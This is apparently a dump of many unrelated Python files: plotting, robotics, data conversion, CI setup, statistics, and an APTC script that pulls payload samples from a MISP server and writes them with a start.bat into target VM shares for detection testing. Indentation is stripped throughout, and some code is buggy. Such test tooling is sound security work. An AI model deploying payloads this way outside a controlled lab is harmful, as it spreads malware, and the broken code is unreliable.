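# A*x**2 + B*x + C = 0 in x; the positive root is taken and its sign is then flipped
# when the intersection angle lies in the second or third quadrant.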
def get_line_ellipse_x_intercept_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
m = math.tan(trad)
    if t == 90 or t == 270:
x = get_line_ellipse_y_intercept_rotated(t, a, b, r, 0)
else:
A = b**2 * (math.cos(rrad)**2 + 2 * m * math.cos(rrad) * math.sin(rrad) + m**2 * math.sin(rrad)**2) \
+ a**2 * (m**2 * math.cos(rrad)**2 - 2 * m * math.cos(rrad) * math.sin(rrad) + math.sin(rrad)**2)
B = 0 # all drops out b/c b1=0 in y=mx+b1
C = -1 * a**2 * b**2
# quadratic eq.
x = (-1 * B + math.sqrt(B**2 - 4 * A * C)) / (2 * A)
# make sure we're in the correct quadrant
if lT > 90 and lT <= 270:
x*=-1
return x
# ---------
def get_line_ellipse_y_intercept_rotated(t, a, b, r, x):
rrad = math.radians(r)
A = b**2 * math.sin(rrad)**2 + a**2 * math.cos(rrad)**2
    B = 2 * x * math.cos(rrad) * math.sin(rrad) * (b**2 - a**2)
C = x**2 * (b**2 * math.cos(rrad)**2 + a**2 * math.sin(rrad)**2) - a**2 * b**2
# quadratic eq.
y = (-1 * B + math.sqrt(B**2 - 4 * A * C)) / (2 * A)
return get_position_x_at_angle(y, t)
# --------
def main():
check_for_issues()
# setup the plot
plt.figure(figsize=(8, 5))
gs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])
ax0 = plt.subplot(gs[0])
ax1 = plt.subplot(gs[1])
ax0.set_title("Concentric Ellipses")
ax1.set_title("Distance between Ellipses")
ax1.set_xlabel("Degrees")
ax0.set_xlim(-1*(a1+1), a1+1)
ax0.set_ylim(-1*(b1+1), b1+1)
# plot a line at set angle
vect_get_position_y_at_angle = np.vectorize(get_position_y_at_angle, excluded='x')
x1 = np.arange(-1*a1, a1+1, 1.0)
ax0.plot(x1, vect_get_position_y_at_angle(x1, lT), color='red')
# Display the second (inner) ellipse before it's rotated (just for fun)
u = np.arange(-1000, 1000, 0.1)
ax0.plot(get_ellipse_x_rational(u, a2), get_ellipse_y_rational(u, b2), color='lightgray')
# plot the first ellipse (not rotated)
vect_get_ellipse_x_standard = np.vectorize(get_ellipse_x_standard, excluded='a')
vect_get_ellipse_y_standard = np.vectorize(get_ellipse_y_standard, excluded='b')
t = np.arange(0, 360, 0.01)
ax0.plot(vect_get_ellipse_x_standard(t, a1), vect_get_ellipse_y_standard(t, b1), color='orange')
# plot the second ellipse, rotated
vect_get_ellipse_x_rotated = np.vectorize(get_ellipse_x_rotated, excluded=['a', 'b', 'r'])
vect_get_ellipse_y_rotated = np.vectorize(get_ellipse_y_rotated, excluded=['a', 'b', 'r'])
t = np.arange(0, 360, 0.01)
ax0.plot(vect_get_ellipse_x_rotated(t, a2, b2, T), vect_get_ellipse_y_rotated(t, a2, b2, T), color='blue')
# plot 2 points along the line of intersection
# plot the point of intersection with the first ellipse (not rotated)
vect_get_line_ellipse_x_intercept_standard = np.vectorize(get_line_ellipse_x_intercept_standard, excluded=['a', 'b'])
x=get_line_ellipse_x_intercept_standard(lT, a1, b1)
y=get_position_y_at_angle(x, lT)
print ("green: %f,%f" % (x,y))
# should be a green dot on the orange ellipse intersecting the red line
ax0.plot(x, y, 'ro', color='green')
# plot the point of intersection with the second ellipse (rotated)
vect_get_line_ellipse_x_intercept_rotated = np.vectorize(get_line_ellipse_x_intercept_rotated, excluded=['a', 'b', 'r'])
x=get_line_ellipse_x_intercept_rotated(lT, a2, b2, T)
y=get_position_y_at_angle(x, lT)
print ("black: %f,%f" % (x,y))
# should be a black dot on the blue ellipse intersecting the red line
ax0.plot(x, y, 'ro', color='black')
# ----------
# calculate the difference between the two ellipses
t = np.arange(0, 360, 0.1)
xnorm=vect_get_line_ellipse_x_intercept_standard(t, a1, b1)
ynorm=vect_get_position_y_at_angle(xnorm, t)
xrot=vect_get_line_ellipse_x_intercept_rotated(t, a2, b2, T)
yrot=vect_get_position_y_at_angle(xrot, t)
# find the diff and when the inner is outside the outer ellipse preserve the sign
# (divide by zero is possible and should be caught)
vect_hypot = np.vectorize(math.hypot)
diff = vect_hypot(xnorm-xrot, ynorm-yrot) * ((xnorm-xrot) / abs(xnorm-xrot))
ax1.plot(t, diff, color='pink')
# ----------
ax0.set_aspect('equal', 'box')
plt.tight_layout()
plt.show()
if __name__ == "__main__":
main()
|
python
|
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='irobot',
version='1.0.0b3',
    description="Python implementation of iRobot's Open Interface",
long_description=long_description,
url='http://blog.lemoneerlabs.com',
author='Matthew Witherwax (lemoneer)',
author_email='[email protected] ',
# Choose your license
license='MIT',
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='robotics irobot roomba',
packages=find_packages(),
install_requires=['pyserial', 'six'],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'create2=irobot.console_interfaces.create2:main'
],
},
)
|
python
|
from helperfunctions_plot import *
from plane_relative import *
from denavit_hartenberg140 import *
import itertools as it
def work_it(M, func=n.diff, axis=1):
return np.apply_along_axis(func, axis, arr=M)
def get_closest_solutions_pair(s0, s1):
## diff_list = []
## index_list0 = []
## index_list1 = []
## for i0, k in enumerate(s0):
## for i1, l in enumerate(s1):
## diff_list.append(k-l)
## index_list0.append(i0)
## index_list1.append(i1)
## index_list0 = mat(index_list0)
## index_list1 = mat(index_list1)
## diff_list = mat(diff_list)
## norm_list = mat(map(norm, diff_list))
## t = (norm_list - min(norm_list)) == 0.0
## index0 = index_list0[t][0]
## index1 = index_list1[t][0]
## return mat((s0[index0], s1[index1]))
data = []
for i, s0i in enumerate(s0):
for j, s1j in enumerate(s1):
data.append([norm(s0i - s1j, ord = None), i, j])
data = mat(data)
ret = []
solution_col_row_pairs = n.argwhere(data == data.min(axis = 0)[0])
solution_indices = solution_col_row_pairs[:,0]
for solution_data in data[solution_indices]:
norm_value, i, j = solution_data
pair = mat([s0[i], s1[j]])
return pair
def get_closest_solution(s0, s):
diff_list = []
index_list1 = []
for i1, l in enumerate(s):
diff_list.append(s0-l)
index_list1.append(i1)
index_list1 = mat(index_list1)
diff_list = mat(diff_list)
norm_list = mat(map(norm, diff_list))
t = (norm_list - min(norm_list)) == 0.0
index1 = index_list1[t][0]
return s[index1]
def add_solutions(solutions, solution_value, index=5):
for s in solutions.T:
tmp1 = s.copy()
tmp2 = s.copy()
old_val = s[index]
tmp1[index] = old_val + solution_value
yield tmp1
tmp2[index] = old_val - solution_value
yield tmp2
def traverse_solutions(*args):
for solutions in args:
for s in solutions.T:
yield s
def make_array(list_of):
return mat(list_of).T
if __name__ == '__main__':
for count in n.linspace(-180,180,10):
ax, fig = init_plot()
fig.clear()
j1 = 180 #rand_range(-180, 180)
j2 = 0#rand_range(-90, 110)
j3 = 0#rand_range(-230, 50)
j4 = 0#rand_range(-200, 200)
j5 = 0#rand_range(-115, 115)
j6 = 0#rand_range(-400, 400)
j1,j2,j3,j4,j5,j6 = (-140.0, -14.35476839088895, 20.6520766452779, 0, 0, 0)
joint_values = j1,j2,j3,j4,j5,j6
T44, debug = forward_kinematics(*joint_values, **DH_TABLE)
sol = inverse_kinematics_irb140(DH_TABLE, T44)
plane0 = define_plane_from_angles([0,0,0],0, 0, 0)
global_robot = matmul_series(*debug)
global_robot.insert(0, debug[0])
global_robot.insert(0, plane0)
global_robot = mat(global_robot)
global_robot_points = global_robot[:,:3,3]
point_matrix = generate_symmetric_curve()
point_matrix_tf = get_transformed_points(T44, point_matrix)
######
ax = fig.add_subplot(1,2,1, projection='3d')
for p in global_robot:
plot_plane(ax, p, '--',scale_factor=0.1)
ax.scatter(point_matrix_tf[:,0],point_matrix_tf[:,1],point_matrix_tf[:,2])
ax.plot(global_robot_points[:,0], global_robot_points[:,1], global_robot_points[:,2],'k',linewidth=2)
plot_equal_perspective(ax, [-0.5,0.5],[-0.5,0.5],[0,1])
#show()
######
plane = global_robot[-1]
s = point_matrix_tf
all_solutions = []
for p in s:
T44 = n.zeros((4,4))
T44[:,3] = p
T44[:3,:3] = plane[:3,:3]
solutions = inverse_kinematics_irb140(DH_TABLE, T44)
solutions = filter_solutions(solutions)
print solutions.T.shape
all_solutions.append(solutions.T)
a = mat(all_solutions)
import time
start = time.time()
#### l = []
#### for i in xrange(len(a)-1):
#### l.append(get_closest_solutions_pair(a[i], a[i+1]))
#### l = mat(l)
sol = []
pair = get_closest_solutions_pair(a[0],a[1])
sol.append(pair[0])
for i in xrange(1,len(a)):
sol.append(get_closest_solution(sol[i-1],a[i]))
sol = mat(sol)
## s = list(l[:,0,:])
## s.append(l[-1,1,:])
## s = mat(s)
print 'stop: %0.2f' % (time.time() - start)
r = work_it(work_it(sol, func=diff, axis=0),func=norm, axis=1)
#r = n.max(n.abs(n.diff(sol,axis=0)),axis=1)
## if (r >= 180.0).any():
## print r
## print n.round(n.max(n.abs(work_it(sol, func=diff, axis=0)),0))
## import pdb; pdb.set_trace()
ax0 = fig.add_subplot(1,2,2)
ax0.plot(n.linspace(0,360,49),r);
xlabel('curve angle')
ylabel('solution distance')
show()
break
print n.round(n.max(n.abs(work_it(sol, func=diff, axis=0)),0))
#show()
#plot(n.max(abs(s-sol), axis=1)); show()
|
python
|
# -*- coding: utf-8 -*-
"""
Author:by 王林清 on 2021/10/31 18:44
FileName:lunyu.py in shiyizhonghua_resource
Tools:PyCharm python3.8.4
"""
from util import get_time_str, save_split_json, get_json
if __name__ == '__main__':
author = {
'name': '孔子',
'time': '春秋',
'desc': '孔子(公元前551年9月28日~公元前479年4月11'
'日),子姓,孔氏,名丘,字仲尼,鲁国陬邑(今山东省曲阜市)'
'人,祖籍宋国栗邑(今河南省夏邑县),中国古代伟大的思想家、'
'政治家、教育家,儒家学派创始人、“大成至圣先师”。 '
}
datas = []
data = get_json(r'./../data/lunyu/lunyu.json')
for dic in data:
time = get_time_str()
datas.append({
'title': f"论语·{dic['chapter']}",
'author': author,
'type': '古文',
'content': dic['paragraphs'],
'create_time': time,
'update_time': time,
'valid_delete': True
})
save_split_json('lunyu', datas)
|
python
|
import cv2 as cv
import os
import numpy as np
class Cartonifier:
def __init__(self, n_downsampling_steps=2, n_filtering_steps=7):
self.num_down = n_downsampling_steps
self.num_bilateral = n_filtering_steps
# def process_folder(self, input_folder, output_folder):
# if not os.path.exists(input_folder):
# raise FileNotFoundError('Input folder {} not found'.format(input_folder))
# if not os.path.exists(output_folder):
# raise FileNotFoundError('Output folder {} not found'.format(output_folder))
# file_path_list = fu.get_absolute_path_list(input_folder)
# for file_path in file_path_list:
# self.process(file_path, output_folder)
def process(self, image, max_value=200):
img_rgb = image
# downsample image using Gaussian pyramid
img_color = img_rgb
for _ in range(self.num_down):
img_color = cv.pyrDown(img_color)
# repeatedly apply small bilateral filter instead of
# applying one large filter
for _ in range(self.num_bilateral):
img_color = cv.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)
# upsample image to original size
for _ in range(self.num_down):
img_color = cv.pyrUp(img_color)
# convert to grayscale and apply median blur
img_gray = cv.cvtColor(img_rgb, cv.COLOR_RGB2GRAY)
img_blur = cv.medianBlur(img_gray, 7)
# detect and enhance edges
img_edge = self.edge_detection_v1(img_blur, max_value)
if img_color.shape[0] != img_edge.shape[0] or img_color.shape[1] != img_edge.shape[1]:
img_color = cv.resize(img_color, (img_edge.shape[1], img_edge.shape[0]))
img_cartoon = cv.bitwise_and(img_color, img_edge)
return img_cartoon
def edge_detection_v1(self, img_blur, max_value):
img_edge = cv.adaptiveThreshold(img_blur, max_value,
cv.ADAPTIVE_THRESH_MEAN_C,
cv.THRESH_BINARY,
blockSize=9,
C=4)
# convert back to color, bit-AND with color image
img_edge = cv.cvtColor(img_edge, cv.COLOR_GRAY2RGB)
return img_edge
# def process_image(self, src):
# self.alpha += 0.01
# if self.alpha > 1:
# self.alpha = 0
# self.current_model += 1
# if self.current_model >= len(self.model_list):
# self.current_model = 1
#
# # Edge detection
# img_edge = self.edge_detection_v2(src)
#
# # Coloured image from ML models
# img_colors = self.feed_forward(src)
#
# # Compose layers
# img_blend = np.clip(((1 - self.beta) * (img_colors - img_edge * 0.1) + self.beta * self.frame).astype(np.uint8),
# 0, 255)
#
# # Blur for smooth effect
# dst = cv.GaussianBlur(img_blend, (5, 5), cv.BORDER_DEFAULT)
# return dst
#
# def edge_detection_v2(self, src):
# dst = cv.GaussianBlur(src, (5, 5), cv.BORDER_DEFAULT)
# dst = cv.Canny(dst, 50, 200)
# # dst = self.edge_detection_v1(dst)
# dst = cv.cvtColor(dst, cv.COLOR_GRAY2RGB)
# dst = np.ones_like(dst) * 255 - dst
# return dst
if __name__ == '__main__':
    c = Cartonifier()
    # process() expects an image array, so load the input and write the result explicitly.
    source = cv.imread("/Users/gilbert/Desktop/test.jpg")
    cartoon = c.process(source)
    cv.imwrite(os.path.join("/Users/gilbert/Desktop/out", "test.jpg"), cartoon)
|
python
|
"""
AR : conditional covariance based Granger Causality
===================================================
This example reproduces the results of Ding et al. 2006 :cite:`ding2006granger`
where in Fig3 there's an indirect transfer of information from Y->X that is
mediated by Z. The problem is that if the Granger Causality is used, there's
indeed a transfer of information from Y->X while with the conditional Granger
causality, conditioning by the past of other sources suppresses this indirect
transfer.
"""
import numpy as np
from frites import set_mpl_style
from frites.simulations import StimSpecAR
from frites.conn import conn_covgc
import matplotlib.pyplot as plt
set_mpl_style()
###############################################################################
# Simulate 3 nodes 40hz oscillations
# ----------------------------------
#
# Here, we use the class :class:`frites.simulations.StimSpecAR` to simulate an
# stimulus-specific autoregressive model made of three nodes (X, Y and Z). This
# network simulates a transfer Y->Z and Z->X such as an indirect transfer from
# Y->X mediated by Z
ar_type = 'ding_3_indirect' # 40hz oscillations
n_stim = 2 # number of stimulus
n_epochs = 50 # number of epochs per stimulus
ss = StimSpecAR()
ar = ss.fit(ar_type=ar_type, n_epochs=n_epochs, n_stim=n_stim)
###############################################################################
# plot the network
plt.figure(figsize=(5, 4))
ss.plot_model()
plt.show()
###############################################################################
# Compute the Granger-Causality
# -----------------------------
#
# We first compute the Granger Causality and then the conditional Granger
# causality (i.e conditioning by the past coming from other sources)
dt, lag, step = 50, 5, 2
t0 = np.arange(lag, ar.shape[-1] - dt, step)
kw_gc = dict(dt=dt, lag=lag, step=1, t0=t0, roi='roi', times='times',
n_jobs=-1)
# granger causality
gc = conn_covgc(ar, conditional=False, **kw_gc)
# conditional granger causality
gc_cond = conn_covgc(ar, conditional=True, **kw_gc)
###############################################################################
# Plot the Granger causality
plt.figure(figsize=(12, 10))
ss.plot_covgc(gc)
plt.tight_layout()
plt.show()
###############################################################################
# Plot the conditional Granger causality
plt.figure(figsize=(12, 10))
ss.plot_covgc(gc_cond)
plt.tight_layout()
plt.show()
###############################################################################
# Direct comparison
# -----------------
#
# In this plot, we only select the transfer of information from Y->X for both
# granger and conditional granger causality
# select Y->X and mean per stimulus for the granger causality
gc_yx = gc.sel(roi='x-y', direction='y->x').groupby('trials').mean('trials')
gc_yx = gc_yx.rename({'trials': 'stimulus'})
# select Y->X and mean per stimulus for the conditional granger causality
gc_cond_yx = gc_cond.sel(roi='x-y', direction='y->x').groupby('trials').mean(
'trials')
gc_cond_yx = gc_cond_yx.rename({'trials': 'stimulus'})
# get (min, max) of granger causality from Y->X
gc_min = min(gc_yx.data.min(), gc_cond_yx.data.min())
gc_max = max(gc_yx.data.max(), gc_cond_yx.data.max())
# sphinx_gallery_thumbnail_number = 4
plt.figure(figsize=(10, 5))
# plot granger causality from Y->X
plt.subplot(121)
gc_yx.plot.line(x='times', hue='stimulus')
plt.title(r'Granger causality Y$\rightarrow$X', fontweight='bold')
plt.axvline(0, color='k', lw=2)
plt.ylim(gc_min, gc_max)
# plot the conditional granger causality from Y->X
plt.subplot(122)
gc_cond_yx.plot.line(x='times', hue='stimulus')
plt.title(r'Conditional Granger causality Y$\rightarrow$X|others',
fontweight='bold')
plt.axvline(0, color='k', lw=2)
plt.ylim(gc_min, gc_max)
plt.tight_layout()
plt.show()
|
python
|
#!/usr/bin/env python3
# Solution to Mega Contest 1 Problem: Sell Candies
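# Greedy idea: sell the most expensive candies first; each sale lowers the price of all
# later candies by 1, and revenue that would go negative is clamped to 0 (mod 1e9+7).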
for testcase in range(int(input())):
net_revenue = 0
n = int(input())
vals = list(map(int, input().split()))
vals.sort(reverse=True)
cost_reduction = 0
for val in vals:
net_revenue += max(val-cost_reduction, 0)
net_revenue %= int(1e9+7)
cost_reduction += 1
print(net_revenue)
|
python
|
# ------------------------------------------------------------------------
# DT-MIL
# Copyright (c) 2021 Tencent. All Rights Reserved.
# ------------------------------------------------------------------------
def build_dataset(image_set, args):
from .wsi_feat_dataset import build as build_wsi_feat_dataset
return build_wsi_feat_dataset(image_set, args)
|
python
|
from .misc import (
camel_to_underscore,
convert_date,
convert_datetime,
dict_from_dataframe,
dir_list,
download_if_new,
get_ulmo_dir,
mkdir_if_doesnt_exist,
module_with_dependency_errors,
module_with_deprecation_warnings,
open_file_for_url,
parse_fwf,
raise_dependency_error,
save_pretty_printed_xml,
)
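# pytables is an optional dependency: if the import below fails, the helpers are replaced
# with raise_dependency_error so callers only get an error when they actually use them.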
try:
from .pytables import (
get_default_h5file_path,
get_or_create_group,
get_or_create_table,
open_h5file,
update_or_append_sortable,
)
except ImportError:
get_default_h5file_path = raise_dependency_error
get_or_create_group = raise_dependency_error
get_or_create_table = raise_dependency_error
open_h5file = raise_dependency_error
update_or_append_sortable = raise_dependency_error
|
python
|
from flask import Flask
from flask import make_response
app = Flask(__name__)
@app.route('/')
def index():
response = make_response('<h1>This document carries a cookie!</h1>')
response.set_cookie('answer', '42')
return response
if __name__ == '__main__':
app.run()
|
python
|
#!/usr/bin/env /usr/bin/python3
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from key import *
import json
import time
import os
from urllib.parse import urljoin
import sys
import traceback
from shutil import copyfile
import logging.handlers
from urllib.parse import quote
import argparse
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.SysLogHandler(address='/dev/log')
formatter = logging.Formatter('APTC: [%(levelname)s][%(filename)s:%(funcName)s():line %(lineno)s] %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
# ensure prefix ends with /
conf_target_path_prefix = '/opt/aptc/targets/' # in case of changing path
conf_script_path_prefix = os.path.dirname(os.path.realpath(__file__)) + '/' # change to /opt/pec later
conf_vm_wait_sec = 60 * 5
conf_poll_sleep_interval_sec = 2
conf_graylog_poll_timeout_sec = 60 * 1
conf_tag_prefix = 'aptc:'
target_query_strings = {} # hostname:query_string
def init(url, key):
return PyMISP(url, key, False, 'json', False)
def get_all_target_host_names(test_case):
host_names = []
share_paths = get_all_target_share_paths(test_case)
for t in share_paths:
hn = t.split('/')
host_names.append(hn[len(hn)-1])
return host_names
def get_all_target_share_paths(test_case):
share_paths = []
targets = get_related_targets(test_case)
for t in targets:
share_paths.append(t['Event']['info'])
return share_paths
def get_related_targets(test_case):
targets = []
if 'RelatedEvent' not in str(test_case):
return targets
for re in test_case['Event']['RelatedEvent']:
if re['Event']['info'].startswith(conf_target_path_prefix):
targets.append(re)
return targets
def get_all_query_strings(m, testcase_id=0):
found = False
r = m.search(eventid=testcase_id)
if 'Tag' not in str(r):
logger.error(str(r))
return found
for e in r['response']:
for t in e['Event']['Tag']:
if t['name'] != conf_tag_prefix + 'test-in-progress':
continue
found = True
related = get_related_targets(e)
for r in related:
if r['Event']['info'] in target_query_strings:
continue
qs = get_target_query_string(m, r['Event']['id'])
target_query_strings[r['Event']['info']] = qs
return found
def write_payload(m, payload_id, test_case):
status, samples = m.download_samples(False, payload_id)
if not status:
return status
share_paths = get_all_target_share_paths(test_case)
total_sample_count = len(samples)
for vm_path in share_paths:
sample_counter = 0
for sample in samples:
sample_counter += 1
filepath = vm_path + '/' + sample[1]
with open(filepath, 'wb') as out:
try:
out.write(sample[2].read())
logger.debug('wrote: ' + filepath)
sample[2].seek(0) # otherwise next target will get a 0 byte file
if sample_counter == total_sample_count:
get_start_bat(m, payload_id, vm_path)
except OSError:
logger.error('fail writing ' + filepath)
continue
if sample_counter == 1: # tag only the first sample
tag(m, payload_id, conf_tag_prefix + 'test-in-progress')
logger.debug('tagged ' + str(payload_id) + ' with ' + conf_tag_prefix + 'test-in-progress')
hostname = vm_path.replace(conf_target_path_prefix, '')
newtag = conf_tag_prefix + '{"target":"' + hostname + '","testcase-id":'
newtag += str(test_case['Event']['id']) + ',"filename":"' + sample[1] + '"}'
m.new_tag(newtag, '#000000', True)
tag(m, payload_id, newtag)
return status
def get_payload_tags(test_case):
t = []
if 'Tag' not in str(test_case):
return t
if 'Tag' in test_case['Event']:
for et in test_case["Event"]["Tag"]:
if et['name'].startswith(conf_tag_prefix + 'payload'):
t.append(et['name'])
return t
def find_tag(m, eid, tag):
r = m.search(eventid=eid)
if 'Tag' not in str(r):
return False
if 'Tag' in r['response'][0]['Event']:
for t in r['response'][0]['Event']['Tag']:
if t['name'].startswith(tag):
return True
return False
def get_all_tags(m, eid):
r = m.search(eventid=eid)
if 'Tag' not in str(r):
return []
if 'Tag' in r['response'][0]['Event']:
return r['response'][0]['Event']['Tag']
return []
def dump(r):
print(json.dumps(r, indent=2))
def wait_for_targets(m, payload_id, test_case):
timeout_sec = conf_vm_wait_sec
all_vm = get_all_target_host_names(test_case)
while len(all_vm) > 0:
for vm in all_vm:
tags = get_all_tags(m, payload_id) # payload may have old results
tags_str = str(tags)
if 'result_' in tags_str and vm in tags_str:
if vm in all_vm:
all_vm.remove(vm)
if len(all_vm) == 0:
break
time.sleep(conf_poll_sleep_interval_sec)
timeout_sec -= conf_poll_sleep_interval_sec
if timeout_sec <= 0:
logger.error('abort due to timeout')
exit()
untag(m, payload_id, conf_tag_prefix + 'test-in-progress')
logger.info('All VM(s) done for payload-' + str(payload_id))
def tag(m, eid, tagname):
try:
r = m.get_event(eid)
m.tag(r['Event']['uuid'], tagname)
logger.debug('tag event ' + str(eid) + ' with ' + str(tagname))
except:
logger.debug(traceback.format_exc())
return True
def untag(m, eid, tagname):
r = m.search(eventid=eid)
if 'uuid' not in str(r):
logger.error(str(r))
return False
uuid = r['response'][0]['Event']['uuid']
for t in r['response'][0]['Event']['Tag']:
if t['name'] == tagname:
logger.debug('untagged ' + tagname + ' from ' + uuid)
m.untag(uuid, t['id'])
return True
def delete_tag(m, eventid, tagname):
r = m.search(eventid=eventid)
if 'Tag' not in str(r):
logger.error(str(r))
return
for t in r['response'][0]['Event']['Tag']:
if t['name'] == tagname:
logger.info('found tagid ' + t['id'])
session = m._PyMISP__prepare_session()
url = urljoin(m.root_url, 'tags/delete/{}'.format(t['id']))
session.post(url)
return
def get_target_query_string(m, target_id):
r = m.search(eventid=target_id)
if 'Attribute' not in str(r):
return ''
for a in r['response'][0]['Event']['Attribute']:
if a['comment'].startswith('graylog'):
return a['value']
return ''
def create_n_tag(m, eventid, tagname, tagcolor):
m.new_tag(tagname, tagcolor, True)
tag(m, eventid, tagname)
def get_start_bat(m, payload_id, target_path):
r = m.search(eventid=payload_id)
if 'Attribute' not in str(r):
logger.error(str(r))
return
for a in r['response'][0]['Event']['Attribute']:
if a['comment'].lower() != 'start.bat':
continue
with open(target_path + '/start.bat', 'w') as out:
try:
out.write(a['value'])
logger.info('wrote: ' + target_path + '/start.bat')
except:
logger.error('fail writing start.bat for payload ' + payload_id)
return
return
def query_graylog(m, query, filename=''):
session = m._PyMISP__prepare_session() # I know this is bad thing...
url = query
if len(filename) == 0:
url = url.replace('FILENAME%20AND%20', '')
else:
url = url.replace('FILENAME', quote(filename))
response = session.get(url)
r = json.loads(response.text)
return int(r['total_results'])
def get_reboot_wait_query(m, target_id):
q = ''
r = m.search(eventid=target_id)
if 'id' not in str(r):
return q
for e in r['response']:
for a in e['Event']['Attribute']:
if 'reboot' in a['comment']:
q = a['value']
break
return q
def rollback_targets(m, test_case):
target_paths = {}
wait_vm = []
wait_sec = conf_vm_wait_sec
if 'RelatedEvent' not in str(test_case):
return
if len(test_case['Event']['RelatedEvent']) == 0:
return
logger.info('starting target roll-back...')
for rt in test_case['Event']['RelatedEvent']:
if rt['Event']['info'].startswith(conf_target_path_prefix):
target_paths[rt['Event']['info']] = get_reboot_wait_query(m, rt['Event']['id'])
if len(target_paths[rt['Event']['info']]) > 0:
copyfile(conf_target_path_prefix + 'shutdown.bat', rt['Event']['info'] + '/start.bat')
wait_vm.append(rt['Event']['info'])
logger.info('waiting for target reboot...')
while len(wait_vm) > 0:
for k, v in target_paths.items():
try:
rc = query_graylog(m, v)
except BaseException as e:
logger.error('graylog query failed: ' + str(e))
                error_tag = conf_tag_prefix + 'roll-back error with graylog result poll'
                create_n_tag(m, test_case['Event']['id'], error_tag, '#aa0000')
return
if rc > 0:
if k in wait_vm:
wait_vm.remove(k)
logger.debug(str(len(wait_vm)) + ' left...')
wait_sec -= conf_poll_sleep_interval_sec
if wait_sec <= 0:
break
time.sleep(conf_poll_sleep_interval_sec)
return
|
python
|
# (C) Datadog, Inc. 2019-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import platform
import stat
import subprocess
import click
import requests
from ....fs import ensure_parent_dir_exists
from ...constants import get_root
from ...testing import get_test_envs
from ..console import CONTEXT_SETTINGS, echo_debug, echo_info
COMPOSE_VERSION = 'v2.5.0'
COMPOSE_RELEASES_URL = f'https://github.com/docker/compose/releases/download/{COMPOSE_VERSION}/'
def upgrade_docker_compose(platform_name):
if platform_name == 'windows':
artifact_name = 'docker-compose-windows-x86_64.exe'
executable_name = 'docker-compose.exe'
else:
artifact_name = 'docker-compose-linux-x86_64'
executable_name = 'docker-compose'
executable_path = os.path.join(os.path.expanduser('~'), '.docker', 'cli-plugins', executable_name)
ensure_parent_dir_exists(executable_path)
response = requests.get(COMPOSE_RELEASES_URL + artifact_name)
response.raise_for_status()
with open(executable_path, 'wb') as f:
for chunk in response.iter_content(16384):
f.write(chunk)
f.flush()
if platform_name != 'windows':
os.chmod(executable_path, os.stat(executable_path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
def display_action(script_file):
display_header = f'Running: {script_file}'
echo_info(f'\n{display_header}\n{"-" * len(display_header)}\n')
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Run CI setup scripts')
@click.argument('checks', nargs=-1)
@click.option('--changed', is_flag=True, help='Only target changed checks')
def setup(checks, changed):
"""
Run CI setup scripts
"""
cur_platform = platform.system().lower()
upgrade_docker_compose(cur_platform)
scripts_path = os.path.join(get_root(), '.azure-pipelines', 'scripts')
echo_info("Run CI setup scripts")
if checks:
if checks[0] == 'skip':
echo_info('Skipping set up')
else:
echo_info(f'Checks chosen: {", ".join(checks)}')
else:
echo_info('Checks chosen: changed')
check_envs = list(get_test_envs(checks, every=True, sort=True, changed_only=changed))
echo_info(f'Configuring these envs: {check_envs}')
for check, _ in check_envs:
check_scripts_path = os.path.join(scripts_path, check)
if not os.path.isdir(check_scripts_path):
echo_debug(f"Skip! No scripts for check `{check}` at: `{check_scripts_path}`")
continue
contents = os.listdir(check_scripts_path)
if cur_platform not in contents:
echo_debug(f"Skip! No scripts for check `{check}` and platform `{cur_platform}`")
continue
setup_files = sorted(os.listdir(os.path.join(check_scripts_path, cur_platform)))
scripts = [s for s in setup_files if not s.startswith("_")]
non_exe = [s for s in setup_files if s.startswith("_")]
non_exe_msg = f" (Non-executable setup files: {non_exe})" if non_exe else ""
echo_info(f'Setting up: {check} with these config scripts: {scripts}{non_exe_msg}')
for script in scripts:
script_file = os.path.join(check_scripts_path, cur_platform, script)
display_action(script_file)
cmd = [script_file]
if script_file.endswith('.py'):
cmd.insert(0, 'python')
subprocess.run(cmd, shell=True, check=True)
|
python
|
#!/usr/bin/env python
"""
Partitioned Least Square class
Developer:
Omar Billotti
Description:
Partitioned Least Square class
"""
from numpy import shape, zeros, hstack, ones, vstack, sum as sum_elements, array, inf, where
from numpy.random import rand
from numpy.linalg import lstsq
from scipy.optimize import nnls
from scipy.linalg import norm
from ._utils import vec1, indextobeta, checkalpha, bmatrix
class PartitionedLs(object):
"""
Partitioned Least Square class
"""
def __init__(self, algorithm="alt"):
"""
Constructor of Partioned Least Square Class
Parameters
----------
algorithm : string
String used to set some algorithm to choose to create
the model. possible values alt and opt
Returns
-------
None.
"""
self.model = None
self.algorithm = algorithm
def fit(self, x, y, p):
"""
Fits a PartialLS Regression model to the given data
Parameters
----------
x : Matrix
describing the examples
y : Array
vector with the output values for each example
p : Matrix
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
Returns
-------
None.
"""
if self.algorithm == "opt":
self.__fit_opt_nnls(x, y, p)
elif self.algorithm == "alt":
self.__fit_alt_nnls(x, y, p)
else:
self.__fit_alt_nnls(x, y, p)
def __fit_opt_nnls(self, x,
y, p):
"""
Fits a PartialLS OPT Regression model to the given data
Parameters
----------
x : Matrix
describing the examples
y : Array
vector with the output values for each example
